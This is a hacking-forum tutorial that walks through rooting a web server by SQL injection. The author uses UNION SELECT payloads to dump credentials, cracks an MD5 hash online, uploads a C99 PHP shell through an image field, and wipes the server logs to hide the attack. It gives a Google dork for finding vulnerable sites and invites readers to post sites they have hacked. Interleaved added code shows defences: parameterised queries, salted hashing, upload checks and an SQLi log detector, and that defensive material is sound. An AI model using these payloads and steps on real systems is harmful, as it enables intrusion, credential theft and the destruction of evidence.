Advanced SQL Injection Part 1: Complete website rooting tutorial, by Mishkat da Sykodevil.
Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Browser. It's a long post that I've made, so have patience to learn it, considering my patience to make it for you all. :D
What all you need
'''''''''''''''''''''''''''''''''''
1. PATIENCE, PATIENCE & PATIENCE :P
2. Mantra Browser (Best Browser For Hackers)
Download from here: http://www.getmantra.com/download/index.html
3. An Admin Finder Tool
Download from here: http://www.mediafire.com/?mryqnzewiky
4. Any PHP Shell you are comfortable with (my personal choice C99)
Download from here: http://www.sh3ll.org/
5. Google Dork to find SQLi Vulnerable sites:
allinurl:.php?id=
Now the process
'''''''''''''''''''''''''''''''
Step 1:
I'm on the home page of the website now
Code:
http://192.168.132.128/
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar1.jpg
Step 2:
I went through all the pages of web site and found a page with URL input
Code:
http://192.168.132.128/?id=13
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar2.jpg
Step 3:
I launched Hackbar by pressing F9
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar3.jpg
Step 4:
The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar4.jpg
Since the page content is different from the previous one, I can make sure that the web page is vulnerable.
Step 5:
Let's find out the number of tables
Code:
http://192.168.132.128/?id=13 order by 1
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar6.jpg
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice it's gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press the + button till I see any changes on the webpage
Code:
http://192.168.132.128/?id=13 order by 7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar7.jpg
Step 7:
I went up to 7 and no change till now
Code:
http://192.168.132.128/?id=13 order by 7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar12.jpg
Step 8:
I'm on 8 now and I can see the page changed
Code:
http://192.168.132.128/?id=13 order by 8
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar13.jpg
Step 9:
Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar14.jpg
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar16.jpg
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar19.jpg
Step 12:
I replaced the number 2 in the URL with another SQL command; it got executed and the result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar21.jpg
The current user is cms_user@localhost
Step 13:
Let's find out the version of the database. I replaced 2 in the URL with the version() command
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar22.jpg
5.0.45 is the version
Step 14:
Let me list all the tables
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar23.jpg
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and it's a big list
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar24.jpg
Step 16:
I want columns from the table "user" and nothing else
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar25.jpg
Step 17:
Let's find the user name
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar27.jpg
Step 18:
Now, what about password
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar26.jpg
It's encrypted
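Why steps 4 to 18 work, and what stops them, as an added example that is not part of the original tutorial: the same id value sent to a query built by string concatenation and to one that validates and binds it. The in-memory SQLite database, the "page" table and the function names are assumptions made for the demo; the "user" table and its columns follow the steps above.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the CMS database (7-column page table is an assumption).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE page (id INTEGER, title TEXT, c3, c4, c5, c6, c7);
        INSERT INTO page VALUES (13, 'Welcome', 3, 4, 5, 6, 7);
        CREATE TABLE user (user_username TEXT, user_password TEXT);
        INSERT INTO user VALUES ('admin', 'constructed-md5-value');
    """)
    return db

def fetch_vulnerable(db, raw_id):
    # Request text is concatenated into the statement, so the database
    # parses whatever follows the number as more SQL.
    return db.execute("SELECT * FROM page WHERE id = " + raw_id).fetchall()

def fetch_hardened(db, raw_id):
    # 1) allowlist the expected type, 2) bind the value as a parameter,
    # so it can only ever be compared with the id column.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return db.execute("SELECT * FROM page WHERE id = ?", (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    probe = "13 UNION SELECT 1,user_password,3,4,5,6,7 from user"  # input from step 18
    leaked = [row[1] for row in fetch_vulnerable(db, probe)]  # second column is shown on the page
    blocked = fetch_hardened(db, probe)
    normal = fetch_hardened(db, "13")
    return leaked, blocked, normal

if __name__ == "__main__":
    leaked, blocked, normal = demo()
    print("concatenated query returned:", leaked)
    print("bound query returned:", blocked, "and for id=13:", normal)
```

With the bound query the single quote from step 4 is rejected as well, so the page no longer changes and the probe tells the visitor nothing.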
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar30.jpg
Step 20:
Voila.!!! I got the password
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar31.jpg
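Steps 19 and 20 succeed because an unsalted MD5 of a password is the same value on every site, so a lookup service can answer from a precomputed list. The sketch below is an added example, not code from the tutorial or the target CMS; it puts that storage format beside a salted, slow PBKDF2 record. The function names and the iteration count are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor; tune it to your own hardware

def md5_record(password):
    # Storage format seen in step 18: same password, same digest, everywhere.
    return hashlib.md5(password.encode()).hexdigest()

def make_record(password):
    # Per-user random salt plus a deliberately slow key-derivation function.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify(password, record):
    salt, expected = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Constant-time comparison so the check does not leak how many bytes matched.
    return hmac.compare_digest(candidate, expected)

def demo():
    password = "constructed-password"  # constructed sample value
    first, second = make_record(password), make_record(password)
    return {
        "md5_repeats": md5_record(password) == md5_record(password),
        "salted_repeats": first[1] == second[1],
        "verify_ok": verify(password, first),
        "verify_wrong": verify("other-password", first),
    }

if __name__ == "__main__":
    print(demo())
```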
Step 21:
Finding the log in page. It was right in front of me
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar32.jpg
NB: You can find it with the Admin Finder tool kit that I've mentioned above. Just copy-paste the URL into Web Admin Finder v2.0 & start searching.
Step 22:
Logging in with the credentials I have
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar33.jpg
Step 23:
Greetings.!!!
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar35.jpg
Step 24:
I'm an admin now. Look at my powers.
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar36.jpg
Step 25:
Let me add an event
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar37.jpg
Step 26:
and of course I want to upload a picture
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar38.jpg
Step 27:
Let's see whether it allows me to upload the shell or not
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar39.jpg
Step 28:
Now I'm pressing on "Add Event" button
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar40.jpg
Step 29:
Nice. Looks like it's got uploaded
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar41.jpg
Step 30:
Let's see where the shell got uploaded to
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar42.jpg
Step 31:
I'm trying to get the default upload location
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar43.jpg
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar44.jpg
Step 32:
Looks like I got it
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar45.jpg
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar46.jpg
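Steps 26 to 33 work because the "picture" field stores whatever file it is given, under the name the client chose, in a folder the web server will execute. A server-side check that closes that path, as an added example rather than code from the target CMS; the function name and the allowed types are assumptions.

```python
import os
import secrets

# Allowed extension -> leading bytes a real file of that type starts with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}

def safe_upload_name(client_name, content):
    """Return the name to store the upload under, or None to reject it."""
    # Drop any directory part the client sent (both separator styles).
    base = os.path.basename(client_name.replace("\\", "/"))
    _, ext = os.path.splitext(base.lower())
    magic = ALLOWED.get(ext)
    if magic is None:
        return None  # .php, .phtml and everything else not on the allowlist
    if not content.startswith(magic):
        return None  # extension says image, content does not
    # The stored name is chosen by the server, so a client-supplied
    # "shell.php.jpg" never reaches the disk under that name.
    return secrets.token_hex(16) + ext

def demo():
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16        # constructed JPEG header
    script = b"<?php /* constructed placeholder */"  # constructed non-image body
    return {
        "c9shell.php": safe_upload_name("c9shell.php", script),
        "event.jpg": safe_upload_name("event.jpg", jpeg),
        "shell.php.jpg": safe_upload_name("shell.php.jpg", jpeg),
        "pic.png": safe_upload_name("pic.png", script),
    }

if __name__ == "__main__":
    for name, stored in demo().items():
        print(name, "->", stored)
```

A file can carry a valid image header and still contain script text, so the upload folder should also sit outside the web root or have script execution turned off.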
Step 34:
I simply clicked on the up button to get the root folder
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar48.jpg
Now I can do whatever I wish. Deface the website, maintain access or whatever. But it's out of the scope of the current tutorial
Step 35:
What I'm interested in is the log folder
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar49.jpg
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar51.jpg
Step 37:
Let me go back and edit the log file
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar52.jpg
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar53.jpg
Step 38:
I deleted the complete log entries. Now saving it.
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar54.jpg
Step 39:
Nice. Log file is empty now
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar56.jpg
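The requests from steps 4 to 18 are, as step 36 says, noisy, and they are easy to pick out of an access log as long as a copy is shipped off the web server before anyone can empty it. The detector below is an added example, not part of the original tutorial; the log lines, the client addresses, the signature names and the threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Patterns taken from the request shapes shown in the steps above.
SIGNATURES = {
    "quote-probe": re.compile(r"=[^&]*'"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\b", re.I),
}
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log sample in common log format.
SAMPLE_LOG = """\
192.168.132.1 - - [01/Jan/2012:21:00:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120
192.168.132.1 - - [01/Jan/2012:21:00:05 +0000] "GET /?id=13%27 HTTP/1.1" 200 312
192.168.132.1 - - [01/Jan/2012:21:00:20 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 312
192.168.132.1 - - [01/Jan/2012:21:00:41 +0000] "GET /?id=13%20UNION%20SELECT%201,2,3,4,5,6,7 HTTP/1.1" 200 5200
192.168.132.1 - - [01/Jan/2012:21:01:02 +0000] "GET /?id=13+UNION+SELECT+1,table_name,3,4,5,6,7+from+information_schema.tables HTTP/1.1" 200 9000
192.168.132.77 - - [01/Jan/2012:21:01:10 +0000] "GET /?id=14 HTTP/1.1" 200 5000
192.168.132.77 - - [01/Jan/2012:21:01:15 +0000] "GET /search?q=O%27Brien HTTP/1.1" 200 4100
"""

def suspects(log_text, min_signatures=2):
    """Map client address -> signatures seen, for clients hitting several of them."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        match = REQUEST.match(line.strip())
        if not match:
            continue
        client, target = match.groups()
        # Undo URL encoding and inline SQL comments before matching.
        decoded = re.sub(r"/\*.*?\*/", " ", unquote_plus(target))
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits[client].add(name)
    # One stray quote (a surname, say) is common; several signatures are not.
    return {c: sorted(n) for c, n in hits.items() if len(n) >= min_signatures}

if __name__ == "__main__":
    for client, names in suspects(SAMPLE_LOG).items():
        print(client, names)
```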
Step 40:
Now, let's remove the c99 shell by pressing Self Remove
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar57.jpg
Step 41:
Confirmed.!!!
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar58.jpg
Step 42:
OK. Good Bye C99
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar59.jpg
Step 43:
Well. It deleted itself
Image Link: http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar60.jpg
So that's it for tonight. I hope all of you will be successful with this tutorial. Please submit your hacked site by Advanced SQL Injection under this post.
Happy Hacking.!!!
Thanks
P5YCH0D3V1L